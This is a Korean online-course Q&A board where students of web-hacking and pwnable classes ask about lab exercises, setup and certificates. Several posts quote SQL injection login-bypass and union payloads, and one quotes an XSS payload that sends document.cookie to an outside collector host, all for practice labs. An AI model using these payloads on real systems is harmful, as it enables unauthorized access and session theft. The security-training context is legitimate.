묻고 답해요
161만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
디스코드 트랙 관련 문의
안녕하세요디스코드에 익숙하지 않다보니 이메일 인증시 트랙이 정확히 어떤것인지 모르겠어서 등록이 힘든데 어디서 확인 가능한지 문의 드립니다
-
미해결BHPT - 호스트 기반 모의해킹 기초
extension 깔아도 드래그 드롭이 안돼요
설치도 됐고환경설정에서 양방향으로 드래그드롭도 돼있는데 왜 안될까요
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
[실습2-2] 인증 우회 공격 오류
인증우회 테스트를 위해 id 에 admin' # pw 에 123 입력했으나 로그인이 안되는 군요 어디가 잘 못 되었을까요 ?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
백틱 사용 이유가 뭐에요?
' union select 13,2from (select 1,2,3 union select * from user) as t limit 2,1 #에서 백틱을 왜 사용하는지 이해가 잘 안되는데 알려주실 수 있으실까요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
SQLi-WAF-5 강의
5:28 쿼리 해상도가 너무 안 좋아서 안보이는데 뭐라고 적혀있는지 알 수 있을까요?
-
미해결RTL - 레드팀 맛보기
수료증 발급이 필요합니다. 강의자료 파트좀 해결해주세요
강의 동영상 X, 강의 자료X 없는 파트가 4개가 있어서이수가 안되니 수료도 불가합니다수료증 발급이 필요한데 인프런 고객센터는 연락이 안됩니다.수료증 발급 할 수 있게 빈 파일이라도 올려주세요부탁드립니다
-
미해결주요정보통신기반시설 2025버전 관리, 물리 Risk 평가
원래 소리가 없는 강의예요?
설명 없이 PPT만 띄워주고 마는 강의인가요? 미리보기때도 소리 안나오길래 강의 수가 얼마 안되어서 그런가보다 했는데 결제 후에도 전부 다 소리가 안나오는데 이게 맞나요? 이럼 수강할 필요가 없는데
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
미션 어떻게 하는 거에요?
미션하라고만 하고 내용이 안떠요;;;
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
XSS 1번문제 질문
XSS 1번 문제 질문 드립니다. 웹 모의해킹에 대한 초보입장에서 시작부터 막히는 상황이라서요.. document.cookie를 통해 cookie값을 알아오기 위해 자신의 웹서버 주소와 포트번호는 어떻게 확인할 수 있나요? cmd>ipconfig를 통해 그냥 IP주소로 입력해도 되는건가요?.. 포트번호는 VM 요청시 받아온 포트번호가 맞을까요?ㅠ
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
xss_WAF_4가 안 됩니다
<iframe srcdoc = "<script>fetch('https://mamibjs.request.dreamhack.games/?'+document.cookie)</script>">서버 주소는 드림핵 툴즈 이용했습니다. 스크립트를 위처럼 작성하고 activate admin bot 버튼 누르면 전송이 와야 되는데 안 옵니다. 제가 직접 작성한 글을 클릭해서 하는건 전송이 또 되는데 어드민 봇이 안되는 거 같습니다. 추가로 xss_WAF_3으로도 해봤는데 이것같은 경우는 정상 작동했습니다.
-
미해결성공적인 SQL 인젝션 공격을 위한, SQL 기본 문법
화면 크기에 대하여
강의 영상을 보면서 따라하기에는 터미널 화면이 너무 작네요. 그냥 눈으로만 볼 수 있을 뿐...따라하면서 배우기는 어려운 강의라고 생각됩니다.
-
미해결RTL - 레드팀 맛보기
강의 자료도 진도율에 포함하여 수강 완료 처리해 주세요.
수업 자료가 진도율에 포함이 되지 않습니다.그래서 강의를 모두 수강하였지만 10% 부족으로 나옵니다.수강 완료 후 받을 수 있는 수료증 발급이 필요합니다.
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
백슬래시에 관하여
실습 중 백슬래시를 세개 사용하여 로그인 시도 중 로그인이 가능한 것을 확인하였습니다. '\'의 경우 이스케이프 문자로 뒤에 오는 값을 문자열로 표현하기 위함으로 알고 있습니다. 그렇다면 '\\'로 사용하면 문자열로서의 "\"가 될것인데,id 값에 '\\\'를 넣을 경우id='\\\'가 됨으로서 최종 id의 값은 문자열로서의 "\'"가 되는 것으로 생각이 되는데 어떻게 로그인이 가능한 것일까요?
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
basic_bof.py가 없어요
압축파일을 해제했는데,강사님처럼 파이썬 파일(.py)는 없네요.pwntools도 깔았는데...어떻게 하면 되는지 알려주시면 감사하겠습니다~
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
cmd로 검색하면 잘 나오는데 웹 페이지에서 작성하면 결과값이 안 나옵니다.
강의처럼‘ union select 'test','test',null,null,'test',null,null,null,null#라고 치고 검색버튼을 누르면 아무런 결과값이 안 나오는데, cmd창에서 쿼리문 작성시 결과값이 잘 나옵니다. 이유가 뭔지 궁금합니다! ㅜㅜ세팅은 똑같이 따라했습니다
-
미해결입문자를 위한 웹해킹 완벽 실습 with Beebox
IPS, WAF 구현했는데 공부에 지장이 있을까요?
GNS3에 IPS, WAF 구현했는데 해당 기능 써도 될까요?혹시 공부에 지장이 있을까요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
SQL Injection - Login
ID 입력란에 페이로드(admin' AND 1=1 -- ) 삽입 시 정상적으로 플래그가 도출되었으나 ID에 'admin', PW 입력란에 페이로드(1' or 1=1 -- ) 삽입 시 플래그가 도출되지 않았습니다. 두번째의 경우ID='admin'AND PW=' 1' or 1=1 -- ' 로 ID가 'admin'이고 PW가 쿼리로 인해 항상 참인데 왜 플래그가 도출되지 않는지 모르겠습니다.
-
미해결모의해킹 실무자가 알려주는, XSS 공격 기법
주의사항 1
수업을 들으면서 민감한 기능을 사용에 주의해야 한다고 하셨는데 그러면 만약 실무진단 도중에 Xss의 위험을 발견하고 세션하이재킹을 시도해보고 싶다면 독단적인 판단이 아니라 담당자와의 이야기를 한 후에 진행해야하나요? 아니면 이런 세세한 부분은 이야기하지 않고 후에 보고서로 제출하는 건가요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
저 웹페이지는 어떻게 들어가나요?
맥북이라 htdocs말고 맥북에 해당하는 폴더에 넣고 localhost/폴더명(insecure_website)/치는데 파일들의 리스트가 뜹니다Index of /insecure_websiteParent Directoryaction.phpauth.phpcommon.phpcss/dom.phpdownload.phperror.phphtmlpurifier/index.phpjoin.phpjs/list.phplogin.phplogout.phpmodify.phpmypage.phppingcheck.phpquery.txtupload/view.phpwithdrawal.phpwrite.phpxmlparser.phpindex.php로 들어갈 경우 아래와 같은 것이 화면에 출력되어,location.href='index.php?page=error&value={$page}';"; } ?>short_open_tag => On => On 이걸로 설정바꿨는데도 계속 똑같습니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
맥북은 어떻게 설치해야 하나요?
.exe파일이 열리지 않습니다
